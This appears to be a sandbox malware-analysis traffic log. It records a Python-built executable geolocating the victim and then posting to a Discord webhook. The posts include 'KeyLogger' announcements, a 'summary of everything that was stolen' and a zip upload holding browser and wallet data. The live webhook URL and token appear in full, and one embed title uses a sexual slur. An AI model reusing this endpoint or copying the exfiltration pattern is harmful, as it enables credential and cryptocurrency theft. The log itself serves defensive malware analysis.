                                                                                                                                                                                                                                        2024-11-15 09:46:16 UTC176INData Raw: 61 35 0d 0a 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 70 6f 73 74 61 6c 22 3a 22 37 35 32 37 30 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 32 2e 37 37 38 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 38 32 31 37 2c 22 49 50 76 34 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 22 2c 22 73 74 61 74 65 22 3a 22 54 65 78 61 73 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: a5{"country_code":"US","country_name":"United States","city":"Dallas","postal":"75270","latitude":32.7787,"longitude":-96.8217,"IPv4":"173.254.250.89","state":"Texas"}0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.1049751162.159.138.2324438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:17 UTC275OUTPOST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Content-Length: 62
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        2024-11-15 09:46:17 UTC62OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 7c 20 40 73 78 72 69 70 74 6b 69 64 22 2c 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 40 65 76 65 72 79 6f 6e 65 22 7d
                                                                                                                                                                                                                                        Data Ascii: {"username": "scriptkid | @sxriptkid", "content": "@everyone"}
                                                                                                                                                                                                                                        2024-11-15 09:46:17 UTC1362INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:17 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: __dcfduid=7607725ea33611ef9e80caae762da552; Expires=Wed, 14-Nov-2029 09:46:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731663978
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRacWiKZrU5dmmSMB95bjwczf33fIqeOdM6nHZMmIEb3%2B%2Bw6OlCGx%2BAo%2FdJSbnzz%2BQ%2FZme1Di87ef5dAvk3wKhlpA4I2SDmZjHYtsf%2BGOTSF2pXvo4jSm8EqJZHG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Set-Cookie: __sdcfduid=7607725ea33611ef9e80caae762da552fbcc4f524d3c7c3fdeb79e124481544d765ce6baf5acf6653995f1588ff4399a; Expires=Wed, 14-Nov-2029 09:46:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        Set-Cookie: __cfruid=7970ba58701abeed2651d16be2bf566e0fb41856-1731663977; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                        2024-11-15 09:46:17 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 58 54 41 75 71 6e 30 2e 52 72 39 4e 33 36 78 63 38 36 77 66 4e 68 35 39 38 31 72 37 75 67 65 5a 44 34 55 68 50 49 34 32 36 6b 6b 2d 31 37 33 31 36 36 33 39 37 37 35 37 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 32 65 35 30 33 33 31 65 65 34 34 37 61 66 2d 44 46 57 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: Set-Cookie: _cfuvid=XTAuqn0.Rr9N36xc86wfNh5981r7ugeZD4UhPI426kk-1731663977571-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e2e50331ee447af-DFW


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.1049757162.159.136.2324438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:18 UTC584OUTPOST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Cookie: __cfruid=7970ba58701abeed2651d16be2bf566e0fb41856-1731663977; __dcfduid=7607725ea33611ef9e80caae762da552; __sdcfduid=7607725ea33611ef9e80caae762da552fbcc4f524d3c7c3fdeb79e124481544d765ce6baf5acf6653995f1588ff4399a; _cfuvid=XTAuqn0.Rr9N36xc86wfNh5981r7ugeZD4UhPI426kk-1731663977571-0.0.1.1-604800000
                                                                                                                                                                                                                                        Content-Length: 686
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        2024-11-15 09:46:18 UTC686OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 7c 20 40 73 78 72 69 70 74 6b 69 64 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 72 61 70 65 64 20 62 79 20 40 73 78 72 69 70 74 6b 69 64 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3e 20 2a 2a 73 63 72 69 70 74 6b 69 64 20 68 61 73 20 69 6e 6a 65 63 74 65 64 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 76 69 63 74 69 6d 3a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 36 35 35 33 35 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 4b 65 79 4c 6f 67 67 65 72 20 5c 75 32 35 30 62 20 40 73 78 72 69 70 74 6b 69 64 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22
                                                                                                                                                                                                                                        Data Ascii: {"username": "scriptkid | @sxriptkid", "embeds": [{"title": "raped by @sxriptkid", "description": "> **scriptkid has injected the following victim:**", "url": "", "color": 65535, "footer": {"text": "scriptkid KeyLogger \u250b @sxriptkid"}, "thumbnail": {"
                                                                                                                                                                                                                                        2024-11-15 09:46:18 UTC905INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:18 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731663979
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XUus5QDG3%2BQgAobFBfTV94APBSMZmKG%2FW5GRE%2BUDCJ4nVjkrzCTvhBqJpbm%2FqUee9nn9rYvI%2FPwl8UvgQDxBf85oGzj12t8NMwMsh0nJRIuIrN%2FNvF%2BZ1Vj0r1xV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8e2e5038fa1d6c56-DFW


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.1049901162.159.138.2324438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:42 UTC277OUTPOST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Content-Length: 1183
                                                                                                                                                                                                                                        2024-11-15 09:46:42 UTC1183OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 73 63 72 69 70 74 6b 69 64 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 2d 20 53 75 6d 6d 61 72 79 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3e 20 2a 2a 48 65 72 65 27 73 20 61 20 73 75 6d 6d 61 72 79 20 6f 66 20 65 76 65 72 79 74 68 69 6e 67 20 74 68 61 74 20 77 61 73 20 73 74 6f 6c 65 6e 3a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 36 37 35 33 39 32 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 73 63 72 69 70 74 6b 69 64 20 4b 65 79 4c 6f 67 67 65 72 20 5c 75 32 35 30 62 20 40 73 78 72 69 70 74 6b 69 64 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22
                                                                                                                                                                                                                                        Data Ascii: {"username": "scriptkid", "embeds": [{"title": "scriptkid - Summary", "description": "> **Here's a summary of everything that was stolen:**", "url": "", "color": 16753920, "footer": {"text": "scriptkid KeyLogger \u250b @sxriptkid"}, "thumbnail": {"url": "
                                                                                                                                                                                                                                        2024-11-15 09:46:42 UTC1358INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:42 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: __dcfduid=851e9a9ca33611ef8eb5cabe1fae9a88; Expires=Wed, 14-Nov-2029 09:46:42 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1731664004
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fpyc3xuSAnhci0rxpeHMZAFX5Fa4ib0NaRDtJyv07t%2BfygE0hR5mCRuJswpx9qLNvhXremGqQJ8CbS%2FpuT6rOT1BVaIXNb4MbZyjoIZ7MjfKRHrHegmj%2Bfn9uwa%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Set-Cookie: __sdcfduid=851e9a9ca33611ef8eb5cabe1fae9a88e92a3a342f5be09cef396874936a30b0da90de3f55da1d6c0a6e433590b77cc5; Expires=Wed, 14-Nov-2029 09:46:42 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                        Set-Cookie: __cfruid=6ab1c74a1bb8acebe17506b080c5367f83ffe629-1731664002; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                        2024-11-15 09:46:42 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 7a 59 73 4e 6a 74 4d 66 4d 56 34 44 65 61 4d 71 61 5f 45 6b 5f 46 38 78 48 73 4c 77 58 77 79 66 54 49 53 68 37 6b 75 50 76 4a 49 2d 31 37 33 31 36 36 34 30 30 32 38 38 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 32 65 35 30 64 31 34 64 39 32 36 62 35 62 2d 44 46 57 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: Set-Cookie: _cfuvid=zYsNjtMfMV4DeaMqa_Ek_F8xHsLwXwyfTISh7kuPvJI-1731664002889-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e2e50d14d926b5b-DFW


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.1049907162.159.136.2324438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC633OUTPOST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Cookie: __cfruid=6ab1c74a1bb8acebe17506b080c5367f83ffe629-1731664002; __dcfduid=851e9a9ca33611ef8eb5cabe1fae9a88; __sdcfduid=851e9a9ca33611ef8eb5cabe1fae9a88e92a3a342f5be09cef396874936a30b0da90de3f55da1d6c0a6e433590b77cc5; _cfuvid=zYsNjtMfMV4DeaMqa_Ek_F8xHsLwXwyfTISh7kuPvJI-1731664002889-0.0.1.1-604800000
                                                                                                                                                                                                                                        Content-Length: 452584
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=cf1f719bb312469bb34301d37190185a
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC36OUTData Raw: 2d 2d 63 66 31 66 37 31 39 62 62 33 31 32 34 36 39 62 62 33 34 33 30 31 64 33 37 31 39 30 31 38 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: --cf1f719bb312469bb34301d37190185a
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC164OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 38 41 45 32 37 34 32 2d 32 42 38 43 2d 30 32 32 31 2d 41 35 38 36 2d 32 32 35 42 38 34 35 31 41 43 46 30 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 35 32 33 34 34 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="88AE2742-2B8C-0221-A586-225B8451ACF0.zip"Content-Length: 452344
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 d3 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 cf 25 6f 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 d1 25 6f 59 dc 0e 09 54 fc a1 06 00 bc e9 06 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 6c bb 67 54 53 5d fb ed bd 13 82 34 a5 84 2a 35 40 30 0a 0a a2 d2 4b 42 51 08 28 41 3a 88 80 a0 82 a2 d2 a4 84 1a 10 e9 90 00 22 d8 12 54 bc e9 4d 40 40 e9 1d a4 23 45 44 4a e8 bd 85 16 da 1b ee e7 f9 9f 73 de 33 ce 87 8c b5 33 b2 37 ec 64 cc eb 77 cd b9 d6 da 91 86 06 3a 67 98 f9 99 01 00 38 83 d6 d5 36 02 00 7a da 21 04 60 3c 45 1b aa 12 29 5a b4 01 e4 61 a4 a3 09 e4 75 0a ce 9f 7c e4 a8 71 4b
                                                                                                                                                                                                                                        Data Ascii: PK%oYBrowsers/PK%oYWallets/PK%oYTDisplay (1).pnglgTS]4*5@0KBQ(A:"TM@@#EDJs337dw:g86z!`<E)Zau|qK
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: b5 04 45 c4 24 e6 7c be de 9e d9 2f b8 81 cf 42 c5 d6 46 a9 36 2e f1 d7 56 e9 6a a0 20 92 3a ce 4a e0 d3 d0 e0 10 d9 18 e4 65 1b ef 1b 15 3b 46 dd 3d 7a 4b fd db 29 b6 91 ca 68 e4 9d 8e 74 39 9e 46 0e df 04 1f df 75 dd f5 01 db ed 8b f6 ba ba 86 ef a3 90 1d c6 1f 52 36 f4 26 d2 1d 2a b3 d6 e8 20 a4 80 15 52 12 2e 84 37 10 46 ed 75 1b 9b 37 61 85 22 4a 23 44 a9 3e 1c 11 b9 d4 cf f4 6a 02 86 6e 1b 4e 58 b3 d4 fb 1f 25 4f 05 63 6b 53 b0 6a c7 18 6e 9c c3 3f 7b 26 9a 05 5c cf 75 bf c1 27 ed ad 75 02 39 fc 13 fc a3 7a a0 5a ec 5f 6d c0 86 fb c3 92 ea d4 ac 6e 3a 6a e2 36 f9 a5 b8 5b be 11 f8 b1 c1 9e 97 1a 21 dd bf a3 67 41 42 6c e9 de 0e d9 c2 e5 ea 3d 84 46 f8 92 d6 77 d1 c9 88 c2 30 be 45 f8 5a 84 7e ef a3 0f 1b 72 e9 55 8d 79 3d 25 dc 9f bb 84 ad 75 76 d0
                                                                                                                                                                                                                                        Data Ascii: E$|/BF6.Vj :Je;F=zK)ht9FuR6&* R.7Fu7a"J#D>jnNX%OckSjn?{&\u'u9zZ_mn:j6[!gABl=Fw0EZ~rUy=%uv
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: c5 80 0c db 67 fb 15 4c da b9 31 58 f5 f5 50 08 dc 13 b9 f3 22 a7 2c 4f a6 7b b8 36 54 66 97 58 89 10 f1 32 32 c1 ad 59 00 3f cf f1 e6 be 7f 17 6b 11 1c 6b 4b 0b 8f 37 bc ea 9f 19 7b a6 fb 10 1a b1 18 02 49 be f4 32 dd f4 d7 54 a6 17 e9 e2 88 b6 aa f5 7b f5 6e 3d 1a b4 be 79 7c c6 e3 5e 83 8d a9 fd 26 37 3d ce 5d 0c ea ac 2b 2c 06 48 6d 25 15 27 f8 35 f7 89 6e 6b 9c 74 83 33 58 54 15 f7 7c 31 ce 71 d1 f0 4d 36 db 93 98 54 42 d8 16 3e 41 90 10 8e b6 5e e7 f7 db d0 85 93 f1 d9 f4 62 b0 31 9f a5 b2 83 fc 0e 02 30 ff 33 bd 7e af 6e 54 0c e4 72 33 5f 93 f1 e8 db a3 cd bc 05 eb 03 cf ed e2 fa 22 88 0d bc b2 5f 2e b3 f7 54 40 a9 8f dd 62 a6 54 4b ab 35 ea 48 18 02 c8 da 32 ec 21 38 5f 34 db 0f 9d c6 41 09 3e b3 5a 96 5b 93 2c 92 da d9 20 ca ab 90 67 27 70 91 fa
                                                                                                                                                                                                                                        Data Ascii: gL1XP",O{6TfX22Y?kkK7{I2T{n=y|^&7=]+,Hm%'5nkt3XT|1qM6TB>A^b103~nTr3_"_.T@bTK5H2!8_4A>Z[, g'p
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: ab dc 92 2c 15 85 e5 25 4d b5 94 2d 9c 08 b7 ef 0b 75 b1 db 7e 6e f1 09 77 39 29 b4 b5 90 ef 1e ab 53 89 f9 9c ec 93 9d de e9 52 0f e3 74 51 07 c5 d7 b3 07 a8 37 c5 d6 7f d0 38 e2 3f 57 39 cc 4a 06 4e 6f 71 e8 a1 5a 46 52 88 a9 d3 88 f6 38 ea 04 35 65 72 2c 1c c6 cf 40 7a 14 db 7a de 99 fd ce 8e 49 59 07 af a1 a8 eb b5 d4 e1 85 84 5c 27 c9 2b 29 65 07 65 87 ad ef a5 14 05 e7 36 50 51 7f 84 2c 84 3f 49 b9 45 39 5c bf 85 7e 80 56 8f 1d 36 e4 5a 48 d0 1d 7a dd b2 f4 3a 29 b5 50 cd d8 f1 03 7b 50 06 63 77 0e 5f ad 02 47 f7 28 2f 53 d5 6a 25 82 16 d4 4b a8 75 31 cc e3 ff f0 97 8f f9 a5 04 07 e2 39 8b ee f4 43 36 43 8b e3 f5 51 92 6f c1 b8 a9 d7 7a 6c 44 81 62 36 14 37 93 76 86 04 47 96 5c b7 89 37 89 9c f5 68 6f a9 c4 bc 32 4e 3d 7b da 6d b7 5e b1 19 ac bf 2c
                                                                                                                                                                                                                                        Data Ascii: ,%M-u~nw9)SRtQ78?W9JNoqZFR85er,@zzIY\'+)ee6PQ,?IE9\~V6ZHz:)P{Pcw_G(/Sj%Ku19C6CQozlDb67vG\7ho2N={m^,
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 14 0b 5c d7 c7 98 43 2d ef 48 e5 4a dd 69 75 f9 94 b7 3e 79 32 38 f6 5f 61 9f 7d d7 a8 51 c3 81 3c 74 4d d0 48 ff 72 43 2d 42 57 01 a6 45 9f 9f 16 3f 5c 94 8e 5b d2 5f 90 fe 07 95 6e 09 c3 20 04 38 31 c5 8b 96 88 55 03 d8 59 5e 7c f9 c1 ed ea 21 96 7e b4 37 b6 00 9d 45 32 97 e4 3f 35 25 84 42 35 47 8f e6 77 a0 49 27 92 b8 58 20 bc 7b a4 c5 7f 86 65 bc ca 7f e2 a1 5a b4 e8 e3 47 68 f0 50 ec 95 28 75 59 c0 45 ae 7e b4 7f a6 fb bf 09 28 a6 f8 c3 4d ec 66 f0 8c 8b 2d 7f 30 9c b0 66 71 fe 5a af fe 12 db bd 88 40 c9 f8 cb 17 53 ca 67 30 1e d3 8a 45 f5 53 62 78 0d 65 52 1f 07 9a 15 e6 88 8a 23 1b 13 3c 01 35 6e 4a 4e 09 9d 52 0a 3e 79 b4 cc e4 13 b1 57 11 1b 53 12 0b 24 5f dc 94 87 d5 79 87 bc 3d 52 60 74 28 3f f1 d4 7b 03 92 8a 22 ed ef 41 ae 21 8c 57 d3 9c e1
                                                                                                                                                                                                                                        Data Ascii: \C-HJiu>y28_a}Q<tMHrC-BWE?\[_n 81UY^|!~7E2?5%B5GwI'X {eZGhP(uYE~(Mf-0fqZ@Sg0ESbxeR#<5nJNR>yWS$_y=R`t(?{"A!W
                                                                                                                                                                                                                                        2024-11-15 09:46:43 UTC16384OUTData Raw: 8b 44 1d 7f 58 11 70 9c ec b4 82 78 a3 4a c7 54 1a e5 5b ff b6 86 3a f1 19 b5 43 ce b1 bd c5 df 7f c3 62 d5 95 30 f1 8b 67 5e 08 d7 85 95 2b d9 44 98 f7 5a fc 18 5a d5 71 53 65 dd 0a 53 bb 4b 50 78 e8 af d2 40 09 0f e4 85 da b1 ff 3e ba 38 41 b2 da 9e 70 0e f3 1e e5 69 7f df b9 30 51 0a e6 03 b5 bc 89 24 bf de be 9d 38 56 a9 c0 73 57 9c ff 92 ea 30 70 fb a2 84 55 c3 d3 72 50 e0 18 31 5f 98 ba 5e d5 44 9c 8b 74 4e f2 da 87 9e bb d9 0d da ed a9 c5 fa 56 4d 54 a6 4e 99 8e b3 c3 54 b9 ed d8 4f 97 14 85 2d 1e f7 7c 5c c6 91 f1 4b 8b d3 59 2c aa fa f9 e4 27 8e 41 64 29 d5 aa 83 79 96 97 23 60 b9 1f 6d cc e6 76 bb 75 63 ff 91 db c1 cd 19 b2 b4 1f 65 7a 01 44 4d ca b6 5c 92 3a 71 7b 2a d9 ec d9 b4 fe 77 2c 78 fd 00 a3 7b 6a 7c be b3 46 76 c0 1a 54 f4 1e d0 70 70
                                                                                                                                                                                                                                        Data Ascii: DXpxJT[:Cb0g^+DZZqSeSKPx@>8Api0Q$8VsW0pUrP1_^DtNVMTNTO-|\KY,'Ad)y#`mvucezDM\:q{*w,x{j|FvTpp
